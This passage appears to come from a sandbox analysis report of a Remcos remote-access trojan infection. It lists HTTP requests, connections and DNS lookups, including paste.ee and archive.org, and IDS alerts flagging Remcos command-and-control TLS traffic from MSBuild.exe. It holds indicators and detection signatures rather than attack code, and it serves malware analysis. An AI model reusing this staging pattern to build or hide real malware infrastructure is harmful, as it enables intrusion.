http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6544
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
7600
backgroundTaskHost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
5164
MSBuild.exe
GET
200
178.237.33.50:80
http://geoplugin.net/json.gp
unknown
whitelisted
3240
SIHClient.exe
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
3240
SIHClient.exe
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
2104
svchost.exe
23.48.23.156:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
4980
RUXIMICS.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3216
svchost.exe
20.198.162.78:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
SG
whitelisted
6544
svchost.exe
40.126.32.136:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
184.30.131.245:80
ocsp.digicert.com
AKAMAI-AS
US
whitelisted
2104
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.166
  • 23.48.23.147
whitelisted
settings-win.data.microsoft.com
  • 51.124.78.146
  • 4.231.128.59
whitelisted
client.wns.windows.com
  • 20.198.162.78
whitelisted
login.live.com
  • 40.126.32.136
  • 20.190.160.130
  • 20.190.160.22
  • 20.190.160.67
  • 20.190.160.128
  • 40.126.32.134
  • 20.190.160.4
  • 40.126.32.138
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
arc.msn.com
  • 20.31.169.57
whitelisted
ia600204.us.archive.org
  • 207.241.227.224
whitelisted
paste.ee
  • 23.186.113.60
shared
geoplugin.net
  • 178.237.33.50
whitelisted
slscr.update.microsoft.com
  • 52.149.20.212
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Misc activity
ET INFO Pastebin-like Service Domain in DNS Lookup (paste .ee)
8120
powershell.exe
Potential Corporate Privacy Violation
ET INFO Pastebin-style Service (paste .ee) in TLS SNI
5164
MSBuild.exe
A Network Trojan was detected
REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash
5164
MSBuild.exe
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 29
5164
MSBuild.exe
Malware Command and Control Activity Detected
ET JA3 Hash - Remcos 3.x/4.x TLS Connection
No debug info